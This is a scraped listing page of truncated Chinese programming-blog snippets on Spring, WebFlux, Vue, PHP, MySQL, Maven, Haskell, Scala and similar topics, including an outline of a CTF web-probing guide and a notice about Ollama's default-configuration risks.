    SpringMVC的国际化WebMVC的核心LocaleResolver,MessageSource。WebMvcAutoConfiguration是SpringBoot中的Web方面的自动配置类。在MVC的配置类里面,如果没有自定义的LocaleResolver,那么就会使用默认的。并且自定义的名称是“localeResolver”,才不会加载默认的。默认使用的是AcceptHeaderLoca
  • Spring Web MVC(1) 我爱Jack springmvc后端java
    一、SpringMVC是什么?核心角色:SpringMVC是⼀套基于Servlet规范的Web开发框架,像餐厅的标准化管理流程,规定了每个环节的职责。用户发起请求(点餐)时,SpringMVC协调各组件处理并响应结果(上菜)。二、MVC模式深度解析类比餐厅模型:角色职责对应Spring组件顾客(用户)发起请求(点菜)浏览器用户服务员(View)展示菜单并上菜(显示结果)JSP/Thymeleaf模
  • 【CTF比赛Web题目快速探测】 D-river securityweb安全安全
    CTF比赛Web题目快速探测一、快速信息收集1.基础信息扫描2.工具自动化辅助二、快速漏洞探测1.高频漏洞靶向测试2.前端相关漏洞三、工具链组合利用1.BurpSuite自动化2.专用工具链3.编码/解码辅助四、常见CTFWeb题快速索引表五、速攻思维导图六、总结在CTF比赛中快速攻克Web题目的核心是“高效信息收集+靶向性漏洞探测”,需结合手动测试与工具链快速定位漏洞类型。以下是一套实战优化流程
  • PHP如何构建高性能的RESTful API 程序小先锋 phprestful开发语言
    在现代Web应用中,RESTfulAPI扮演着至关重要的角色。它们使得不同的服务和应用可以轻松地互相通信和交换数据。PHP作为一种流行的服务器端脚本语言,自然也是构建RESTfulAPI的常用工具之一。然而,仅仅使用PHP并不足以保证API的高性能。本文将深入探讨如何使用PHP构建高性能的RESTfulAPI,包括设计原则、性能优化、安全性考虑以及扩展性等方面。一、设计原则简洁明了的API设计RE
  • Django 中的算法应用与实现 岱宗夫up 教学sqlite数据库pythondjangoopencv
    Django中的算法应用与实现在Django开发中,算法的应用可以极大地扩展Web应用的功能和性能。从简单的数据处理到复杂的机器学习模型,Django都可以作为一个强大的后端框架来支持这些算法的实现。本文将介绍几种常见的算法及其在Django中的使用方法。1\.协同过滤算法1.1算法简介协同过滤是一种常用的推荐系统算法,通过分析用户的行为数据(如评分、浏览历史等),为用户推荐他们可能感兴趣的内容。
  • 使用PHP爬虫获取1688商品分类:实战案例指南 数据小爬虫@ php爬虫开发语言
    在电商领域,商品分类信息是商家进行市场调研、选品分析和竞争情报收集的重要基础。1688作为国内领先的B2B电商平台,提供了丰富且详细的商品分类数据。通过PHP爬虫技术,我们可以高效地获取这些分类信息,为商业决策提供有力支持。一、为什么选择PHP爬虫?PHP是一种广泛使用的服务器端脚本语言,特别适合用于Web开发和网络爬虫。它具有强大的网络请求和HTML解析能力,能够轻松实现从网页中提取数据的功能。
  • Spring Boot整合Spring Security与JWT实现无状态认证:实战指南 老哥不老 笔记springspringboot数据库
    SpringBoot整合SpringSecurity与JWT实现无状态认证:实战指南一、JWT认证原理简介JSONWebToken(JWT)是一种开放标准(RFC7519),由三部分组成:Header(头部):声明令牌类型和签名算法Payload(负载):携带用户身份信息Signature(签名):防篡改验证认证流程:客户端提交登录凭证服务端验证通过后生成JWT客户端后续请求携带JWT服务端验证J
  • 关于大模型工具 Ollama 存在安全风险的情况通报 不是太高的手 安全
    据清华大学网络空间测绘联合研究中心分析,开源跨平台大模型工具Ollama默认配置存在未授权访问与模型窃取等安全隐患。鉴于目前DeepSeek等大模型的研究部署和应用非常广泛,多数用户使用Ollama私有化部署且未修改默认配置,存在数据泄露、算力盗取、服务中断等安全风险,极易引发网络和数据安全事件。一、风险隐患详情使用Ollma在本地部署DeepSeek等大模型时,会在本地启动一个Web服务,并默认
  • uniapp websocket实现数据实时更新 jonychen1 websocketweb推送uniapp
    近期个人在使用uniapp开发一款实时图表的项目,因为涉及到数据的实时刷新,所以起初是考虑使用轮询来实现。不过一旦数据量大起来后,轮询对客户端和服务端的压力都比较大,导致使用轮询的扩展性不佳。搜索了一遍,很多开发者建议使用websocket来实现数据的实时更新。什么是websocketWebSocket是Html5定义的一个新协议,与传统的http协议不同,该协议可以实现服务器与客户端之间全双工通
  • COMP333 public websites 后端
    Redistributingthisfile(includingpartially)toCourseHeroorotherpublicwebsitesisstrictlyprohibited.COMP3334-ProjectSection1:OverviewOnlinestorageisapopularapplicationinourdailylife.Withonlinestorage,ause
  • 使用 Spring Boot 实现前后端分离的海康威视 SDK 视频监控 William Dawson springboot
    使用SpringBoot实现前后端分离的海康威视SDK视频监控系统,可以分为以下几个步骤:1.系统架构设计前端:使用Vue.js、React或Angular等前端框架实现用户界面。后端:使用SpringBoot提供RESTfulAPI,负责与海康威视SDK交互。通信:前后端通过HTTP/WebSocket进行通信。视频流:通过海康威视SDK获取视频流,并使用RTSP/RTMP/HLS等协议推送到前
  • Spring WebFlux 入门指南 zru_9602 javaspringjava后端
    SpringWebFlux入门指南1.什么是SpringWebFlux?SpringWebFlux是Spring5引入的一个基于Reactor的响应式编程框架,它是SpringMVC的异步非阻塞替代方案,适用于高并发场景。2.WebFlux与SpringMVC对比特性SpringWebFluxSpringMVC编程模型响应式(ReactiveStreams)阻塞式(ServletAPI)适用场景高
  • awesome python 中文版 相见恨晚!(pythonNB的第三方资源库) weixin_30788731
    AwesomePython中文版来啦!原文链接:Python资源大全内容包括:Web框架、网络爬虫、网络内容提取、模板引擎、数据库、数据可视化、图片处理、文本处理、自然语言处理、机器学习、日志、代码分析等。GitHub-jobbole/awesome-python-cn:Python资源大全中文版环境管理管理Python版本和环境的工具p–非常简单的交互式python版本管理工具。pyenv–简单
  • 工程化与框架系列(22)--前端性能优化(中) 一进制ᅟᅠ        ‌‍‎‏  前端工程化与框架前端性能优化状态模式
    前端性能优化(运行)引言运行时性能直接影响用户交互体验和应用流畅度。本文将深入探讨前端运行时性能优化的各种策略和技术,包括渲染优化、内存管理、计算优化等关键主题,帮助开发者构建高性能的Web应用。运行时性能概述运行时性能优化主要关注以下方面:渲染性能:减少重排重绘,优化动画效果内存管理:防止内存泄漏,优化内存使用计算优化:提升JavaScript执行效率事件处理:优化事件监听和响应异步操作:合理使
  • Spring WebFlux 入门:WebFlux 是什么?它的作用是什么? 2401_89793006 javaspringjava后端
    SpringWebFlux入门:WebFlux是什么?它的作用是什么?1.WebFlux是什么?SpringWebFlux是Spring5引入的响应式Web框架,它基于Reactor库,旨在提供异步、非阻塞的编程模型,能够在高并发场景下提升系统吞吐量。WebFlux主要有以下特点:非阻塞I/O:使用Reactor框架支持完全的响应式流处理。支持事件驱动:采用Reactor的Mono和Flux处理数
  • Vue.js 开发入门指南 2401_89793006 热门话题vue.jsflutter前端
    Vue.js开发入门指南Vue.js是一款流行的前端框架,它轻量、高效且易于上手,非常适合构建交互式Web应用。本文将介绍Vue.js的基础概念,并带你实现一个简单的Vue应用。1.Vue.js简介Vue.js是一个渐进式JavaScript框架,核心库专注于视图层,并且易于与其他库或现有项目集成。它的主要特点包括:双向数据绑定:数据和视图保持同步。组件化开发:方便代码复用,提高开发效率。虚拟DO
  • 深入解析MySQL备份技术:从逻辑到物理的全面指南 PLUTO t MYSQLmysql
    一、MySQL支持的备份技术有哪些?逻辑备份原理:像“抄作业”一样,将数据库中的结构和数据逐行导出为SQL或CSV文件。工具:mysqldump:最常用的工具,兼容性好。mysqlpump:支持并行导出和压缩,适合大数据量。适用场景:小规模数据迁移(如从开发环境导出到测试环境)。跨版本恢复(如从MySQL5.7迁移到8.0)。导出部分表或库(比如只备份用户表)。物理备份原理:直接复制数据库的“物理
  • 网络安全防御矩阵:从云防火墙流量清洗到WAF语义分析的立体化防护 安全网络安全云计算
    在当今数字化浪潮中,网络安全愈发重要,云防火墙与Web应用防火墙作为网络安全防护的关键力量,备受关注。云防火墙定义云防火墙依托云计算技术而生,它并非传统意义上孤立存在于本地的防火墙设备,而是基于云计算平台构建的。借助云计算的分布式架构与弹性扩展能力,云防火墙能够为用户提供灵活、高效、可扩展的网络安全防护服务,轻松应对大规模网络流量的实时监测与管控。架构策略管理模块,它负责制定和管理防火墙的访问控制
  • 【前端知识】Web Components开发框架quarkC介绍 问道飞鱼 前端开发技术前端javascript开发语言webcomponents
    文章目录概述**QuarkC简介****核心特性****QuarkC的使用方法****1.安装QuarkC****2.创建一个简单的QuarkC组件****3.使用组件****QuarkC的优势****1.更低的学习成本****2.更好的开发体验****3.跨框架兼容性****4.性能优化****5.社区支持与生态****6.开放性和灵活性****QuarkC的适用场景****总结**构建复杂We
  • jsonp 常用util方法 hw1287789687 jsonpjsonp常用方法jsonp callback
    jsonp 常用java方法 (1)以jsonp的形式返回:函数名(json字符串) /*** * 用于jsonp调用 * @param map : 用于构造json数据 * @param callback : 回调的javascript方法名 * @param filters : <code>SimpleBeanPropertyFilter theFilt
  • 多线程场景 alafqq 多线程
    0 能不能简单描述一下你在java web开发中需要用到多线程编程的场景?0 对多线程有些了解,但是不太清楚具体的应用场景,能简单说一下你遇到的多线程编程的场景吗? Java多线程 2012年11月23日 15:41 Young9007 Young9007 4 0 0 4 Comment添加评论关注(2) 3个答案 按时间排序 按投票排序 0 0 最典型的如: 1、
  • Maven学习——修改Maven的本地仓库路径 Kai_Ge maven
          安装Maven后我们会在用户目录下发现.m2 文件夹。默认情况下,该文件夹下放置了Maven本地仓库.m2/repository。所有的Maven构件(artifact)都被存储到该仓库中,以方便重用。但是windows用户的操作系统都安装在C盘,把Maven仓库放到C盘是很危险的,为此我们需要修改Maven的本地仓库路径。    
  • placeholder的浏览器兼容 120153216 placeholder
    【前言】 自从html5引入placeholder后,问题就来了, 不支持html5的浏览器也先有这样的效果, 各种兼容,之前考虑,今天测试人员逮住不放, 想了个解决办法,看样子还行,记录一下。   【原理】 不使用placeholder,而是模拟placeholder的效果, 大概就是用focus和focusout效果。   【代码】 <scrip
  • debian_用iso文件创建本地apt源 2002wmj Debian
    1.将N个debian-506-amd64-DVD-N.iso存放于本地或其他媒介内,本例是放在本机/iso/目录下 2.创建N个挂载点目录 如下: debian:~#mkdir –r /media/dvd1 debian:~#mkdir –r /media/dvd2 debian:~#mkdir –r /media/dvd3 …. debian:~#mkdir –r /media
  • SQLSERVER耗时最长的SQL 357029540 SQL Server
    对于DBA来说,经常要知道存储过程的某些信息: 1.   执行了多少次 2.   执行的执行计划如何 3.   执行的平均读写如何 4.   执行平均需要多少时间 列名          &
  • com/genuitec/eclipse/j2eedt/core/J2EEProjectUtil 7454103 eclipse
    今天eclipse突然报了com/genuitec/eclipse/j2eedt/core/J2EEProjectUtil 错误,并且工程文件打不开了,在网上找了一下资料,然后按照方法操作了一遍,好了,解决方法如下: 错误提示信息: An error has occurred.See error log for more details. Reason: com/genuitec/
  • 用正则删除文本中的html标签 adminjun javahtml正则表达式去掉html标签
    使用文本编辑器录入文章存入数据中的文本是HTML标签格式,由于业务需要对HTML标签进行去除只保留纯净的文本内容,于是乎Java实现自动过滤。 如下: public static String Html2Text(String inputString) { String htmlStr = inputString; // 含html标签的字符串 String textSt
  • 嵌入式系统设计中常用总线和接口 aijuans linux 基础
                   嵌入式系统设计中常用总线和接口         任何一个微处理器都要与一定数量的部件和外围设备连接,但如果将各部件和每一种外围设备都分别用一组线路与CPU直接连接,那么连线
  • Java函数调用方式——按值传递 ayaoxinchao java按值传递对象基础数据类型
    Java使用按值传递的函数调用方式,这往往使我感到迷惑。因为在基础数据类型和对象的传递上,我就会纠结于到底是按值传递,还是按引用传递。其实经过学习,Java在任何地方,都一直发挥着按值传递的本色。   首先,让我们看一看基础数据类型是如何按值传递的。   public static void main(String[] args) { int a = 2;
  • ios音量线性下降 bewithme ios音量
    直接上代码吧   //second 几秒内下降为0 - (void)reduceVolume:(int)second { KGVoicePlayer *player = [KGVoicePlayer defaultPlayer]; if (!_flag) { _tempVolume = player.volume;
  • 与其怨它不如爱它 bijian1013 选择理想职业规划
            抱怨工作是年轻人的常态,但爱工作才是积极的心态,与其怨它不如爱它。         一般来说,在公司干了一两年后,不少年轻人容易产生怨言,除了具体的埋怨公司“扭门”,埋怨上司无能以外,也有许多人是因为根本不爱自已的那份工作,工作完全成了谋生的手段,跟自已的性格、专业、爱好都相差甚远。  
  • 一边时间不够用一边浪费时间 bingyingao 工作时间浪费
    一方面感觉时间严重不够用,另一方面又在不停的浪费时间。 每一个周末,晚上熬夜看电影到凌晨一点,早上起不来一直睡到10点钟,10点钟起床,吃饭后玩手机到下午一点。 精神还是很差,下午像一直野鬼在城市里晃荡。 为何不尝试晚上10点钟就睡,早上7点就起,时间完全是一样的,把看电影的时间换到早上,精神好,气色好,一天好状态。 控制让自己周末早睡早起,你就成功了一半。 有多少个工作
  • 【Scala八】Scala核心二:隐式转换 bit1129 scala
    Implicits work like this: if you call a method on a Scala object, and the Scala compiler does not see a definition for that method in the class definition for that object, the compiler will try to con
  • sudoku slover in Haskell (2) bookjovi haskellsudoku
    继续精简haskell版的sudoku程序,稍微改了一下,这次用了8行,同时性能也提高了很多,对每个空格的所有解不是通过尝试算出来的,而是直接得出。   board = [0,3,4,1,7,0,5,0,0, 0,6,0,0,0,8,3,0,1, 7,0,0,3,0,0,0,0,6, 5,0,0,6,4,0,8,0,7,
  • Java-Collections Framework学习与总结-HashSet和LinkedHashSet BrokenDreams linkedhashset
            本篇总结一下两个常用的集合类HashSet和LinkedHashSet。         它们都实现了相同接口java.util.Set。Set表示一种元素无序且不可重复的集合;之前总结过的java.util.List表示一种元素可重复且有序
  • 读《研磨设计模式》-代码笔记-备忘录模式-Memento bylijinnan java设计模式
    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ import java.util.ArrayList; import java.util.List; /* * 备忘录模式的功能是,在不破坏封装性的前提下,捕获一个对象的内部状态,并在对象之外保存这个状态,为以后的状态恢复作“备忘”
  • 《RAW格式照片处理专业技法》笔记 cherishLC PS
    注意,这不是教程!仅记录楼主之前不太了解的 一、色彩(空间)管理 作者建议采用ProRGB(色域最广),但camera raw中设为ProRGB,而PS中则在ProRGB的基础上,将gamma值设为了1.8(更符合人眼) 注意:bridge、camera raw怎么设置显示、输出的颜色都是正确的(会读取文件内的颜色配置文件),但用PS输出jpg文件时,必须先用Edit->conv
  • 使用 Git 下载 Spring 源码 编译 for Eclipse crabdave eclipse
    使用 Git 下载 Spring 源码 编译 for Eclipse   1、安装gradle,下载 http://www.gradle.org/downloads 配置环境变量GRADLE_HOME,配置PATH  %GRADLE_HOME%/bin,cmd,gradle -v   2、spring4 用jdk8 下载 https://jdk8.java.
  • mysql连接拒绝问题 daizj mysql登录权限
    mysql中在其它机器连接mysql服务器时报错问题汇总 一、[running][email protected]:~$mysql -uroot -h 192.168.9.108 -p   //带-p参数,在下一步进行密码输入 Enter password:    //无字符串输入 ERROR 1045 (28000): Access
  • Google Chrome 为何打压 H.264 dsjt applehtml5chromeGoogle
    Google 今天在 Chromium 官方博客宣布由于 H.264 编解码器并非开放标准,Chrome 将在几个月后正式停止对 H.264 视频解码的支持,全面采用开放的 WebM 和 Theora 格式。 Google 在博客上表示,自从 WebM 视频编解码器推出以后,在性能、厂商支持以及独立性方面已经取得了很大的进步,为了与 Chromium 现有支持的編解码器保持一致,Chrome
  • yii 获取控制器名 和方法名 dcj3sjt126com yiiframework
    1. 获取控制器名 在控制器中获取控制器名:  $name = $this->getId(); 在视图中获取控制器名:    $name = Yii::app()->controller->id;    2. 获取动作名  在控制器beforeAction()回调函数中获取动作名:  $name =
  • Android知识总结(二) come_for_dream android
    明天要考试了,速速总结如下   1、Activity的启动模式        standard:每次调用Activity的时候都创建一个(可以有多个相同的实例,也允许多个相同Activity叠加。)        singleTop:可以有多个实例,但是不允许多个相同Activity叠加。即,如果Ac
  • 高洛峰收徒第二期:寻找未来的“技术大牛” ——折腾一年,奖励20万元 gcq511120594 工作项目管理
    高洛峰,兄弟连IT教育合伙人、猿代码创始人、PHP培训第一人、《细说PHP》作者、软件开发工程师、《IT峰播》主创人、PHP讲师的鼻祖! 首期现在的进程刚刚过半,徒弟们真的很棒,人品都没的说,团结互助,学习刻苦,工作认真积极,灵活上进。我几乎会把他们全部留下来,现在已有一多半安排了实际的工作,并取得了很好的成绩。等他们出徒之日,凭他们的能力一定能够拿到高薪,而且我还承诺过一个徒弟,当他拿到大学毕
  • linux expect heipark expect
    1. 创建、编辑文件go.sh   #!/usr/bin/expect spawn sudo su admin expect "*password*" { send "13456\r\n" } interact    2. 设置权限   chmod u+x go.sh  3.
  • Spring4.1新特性——静态资源处理增强 jinnianshilongnian spring 4.1
    目录 Spring4.1新特性——综述 Spring4.1新特性——Spring核心部分及其他 Spring4.1新特性——Spring缓存框架增强 Spring4.1新特性——异步调用和事件机制的异常处理 Spring4.1新特性——数据库集成测试脚本初始化 Spring4.1新特性——Spring MVC增强 Spring4.1新特性——页面自动化测试框架Spring MVC T
  • idea ubuntuxia 乱码 liyonghui160com
      1.首先需要在windows字体目录下或者其它地方找到simsun.ttf 这个 字体文件。 2.在ubuntu 下可以执行下面操作安装该字体: sudo mkdir /usr/share/fonts/truetype/simsun sudo cp simsun.ttf /usr/share/fonts/truetype/simsun fc-cache -f -v
  • 改良程序的11技巧 pda158 技巧
    有很多理由都能说明为什么我们应该写出清晰、可读性好的程序。最重要的一点,程序你只写一次,但以后会无数次的阅读。当你第二天回头来看你的代码 时,你就要开始阅读它了。当你把代码拿给其他人看时,他必须阅读你的代码。因此,在编写时多花一点时间,你会在阅读它时节省大量的时间。   让我们看一些基本的编程技巧:   尽量保持方法简短 永远永远不要把同一个变量用于多个不同的
  • 300个涵盖IT各方面的免费资源(下)——工作与学习篇 shoothao 创业免费资源学习课程远程工作
    工作与生产效率:   A. 背景声音 Noisli:背景噪音与颜色生成器。 Noizio:环境声均衡器。 Defonic:世界上任何的声响都可混合成美丽的旋律。 Designers.mx:设计者为设计者所准备的播放列表。 Coffitivity:这里的声音就像咖啡馆里放的一样。 B. 避免注意力分散 Self Co
  • 深入浅出RPC uule rpc
    深入浅出RPC-浅出篇 深入浅出RPC-深入篇   RPC Remote Procedure Call Protocol 远程过程调用协议   它是一种通过网络从远程计算机程序上请求服务,而不需要了解底层网络技术的协议。RPC协议假定某些传输协议的存在,如TCP或UDP,为通信程序之间携带信息数据。在OSI网络通信模型中,RPC跨越了传输层和应用层。RPC使得开发
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他